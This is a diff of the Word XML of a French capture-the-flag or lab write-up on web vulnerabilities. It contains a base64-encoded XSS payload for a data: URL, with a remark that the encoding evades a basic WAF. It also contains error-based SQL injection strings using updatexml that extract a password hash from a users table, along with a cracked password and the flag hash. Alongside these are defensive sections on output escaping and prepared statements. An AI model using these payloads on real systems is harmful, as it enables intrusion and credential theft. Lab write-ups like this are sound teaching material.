           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t xml:space="preserve">en base64 ce qui donne </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>('XSS')&lt;/script&gt; en base64 ce qui donne PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
+        <w:t>PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Puis le mettre directement dans l’URL :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
@@ -2799,6 +2413,15 @@
       <w:pPr>
         <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
           <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
           <w:b/>
           <w:bCs/>
@@ -2808,10 +2431,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5908C424" wp14:editId="11AADE6B">
-            <wp:extent cx="5760720" cy="2303145"/>
-            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5908C424" wp14:editId="2B4C331C">
+            <wp:extent cx="5591175" cy="2235360"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1230506776" name="Image 1" descr="Une image contenant texte, capture d’écran, Police, Page web&#10;&#10;Le contenu généré par l’IA peut être incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2832,7 +2456,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="2303145"/>
+                      <a:ext cx="5599067" cy="2238515"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2855,12 +2479,6 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>L'utilisation du protocole data: permet d'injecter directement le contenu malveillant dans le DOM de la page sans charger de fichier externe. L'encodage en Base64 permet de masquer les balises &lt;script&gt; pour éviter une détection par un pare-feu applicatif (WAF) rudimentaire.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2872,6 +2490,23 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>L'utilisation du protocole data: permet d'injecter directement le contenu malveillant dans le DOM de la page sans charger de fichier externe. L'encodage en Base64 permet de masquer les balises &lt;script&gt; pour éviter une détection par un pare-feu applicatif (WAF) rudimentaire.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2928,47 +2563,7 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Protection contre les failles XSS (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Reflected</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Stored</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Protection contre les failles XSS (Reflected &amp; Stored)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3001,35 +2596,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Nettoyage des données (Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>Escaping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) : La fonction </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>htmlspecialchars</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>() est la méthode la plus efficace en PHP. Elle transforme les caractères spéciaux (comme &lt; et &gt;) en entités HTML inoffensives. Ainsi, le navigateur affiche le script sous forme de texte brut au lieu de l'exécuter.</w:t>
+        <w:t>Nettoyage des données (Output Escaping) : La fonction htmlspecialchars() est la méthode la plus efficace en PHP. Elle transforme les caractères spéciaux (comme &lt; et &gt;) en entités HTML inoffensives. Ainsi, le navigateur affiche le script sous forme de texte brut au lieu de l'exécuter.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3052,85 +2619,23 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Exemple : Le serveur transforme &lt;script&gt; en &amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>lt;script&amp;gt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>Exemple : Le serveur transforme &lt;script&gt; en &amp;lt;script&amp;gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>htmlspecialchars</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>user_input</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>, ENT_QUOTES, 'UTF-8');</w:t>
+        <w:t>echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3249,7 +2754,6 @@
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3257,18 +2761,19 @@
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
         </w:rPr>
-        <w:t>2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3312,6 +2817,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B112CDC" wp14:editId="190BF507">
             <wp:extent cx="4232450" cy="2179675"/>
@@ -3356,6 +2862,14 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3399,7 +2913,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -3601,7 +3114,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> donne </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3610,7 +3122,6 @@
         </w:rPr>
         <w:t>albatroz</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3668,43 +3179,13 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>albatroz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="92D050"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>" | sha256sum</w:t>
+        <w:t>echo -n "albatroz" | sha256sum</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3799,7 +3280,6 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3809,7 +3289,6 @@
         </w:rPr>
         <w:t>Based</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3917,35 +3396,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">5 AND </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>updatexml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(1,concat(0x7e,(SELECT Commentaire FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
+        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT Commentaire FROM users LIMIT 3,1),0x7e),1)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3961,75 +3412,72 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5 AND </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>updatexml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(1,concat(0x7e,(SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>countersign</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B1DBA9" wp14:editId="0244CA8D">
+            <wp:extent cx="4305300" cy="381000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="811913663" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="811913663" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4305300" cy="381000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT countersign FROM users LIMIT 3,1),0x7e),1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C838052" wp14:editId="13302199">
             <wp:extent cx="4381500" cy="495300"/>
@@ -4046,7 +3494,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId40"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4078,49 +3526,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">5 AND </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>updatexml</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>(1,concat(0x7e,(SELECT SUBSTRING(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>countersign</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, 20, 40) FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LIMIT 3,1),0x7e),1)</w:t>
+        <w:t>Cela ne nous renvoit qu’une partie du hash donc pour avoir l’autre partie :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>5 AND updatexml(1,concat(0x7e,(SELECT SUBSTRING(countersign, 20, 40) FROM users LIMIT 3,1),0x7e),1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4150,7 +3570,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId41"/>
+                    <a:blip r:embed="rId42"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4190,7 +3610,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> cela donne </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4199,7 +3618,6 @@
         </w:rPr>
         <w:t>FortyTwo</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4228,7 +3646,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42"/>
+                    <a:blip r:embed="rId43"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4260,7 +3678,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Une fois mit en minuscule :</w:t>
+        <w:t>On met donc FortyTwo en fortytwo :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4275,10 +3693,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619E942D" wp14:editId="1BA7699A">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA03B63" wp14:editId="2013459E">
             <wp:extent cx="4305300" cy="381000"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="811913663" name="Image 1"/>
+            <wp:docPr id="149211976" name="Image 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4290,7 +3708,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4451,27 +3869,7 @@
           <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Protection contre les Injections SQL (Union &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Error-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Protection contre les Injections SQL (Union &amp; Error-based)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4506,49 +3904,20 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Requêtes Préparées (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Prepared</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
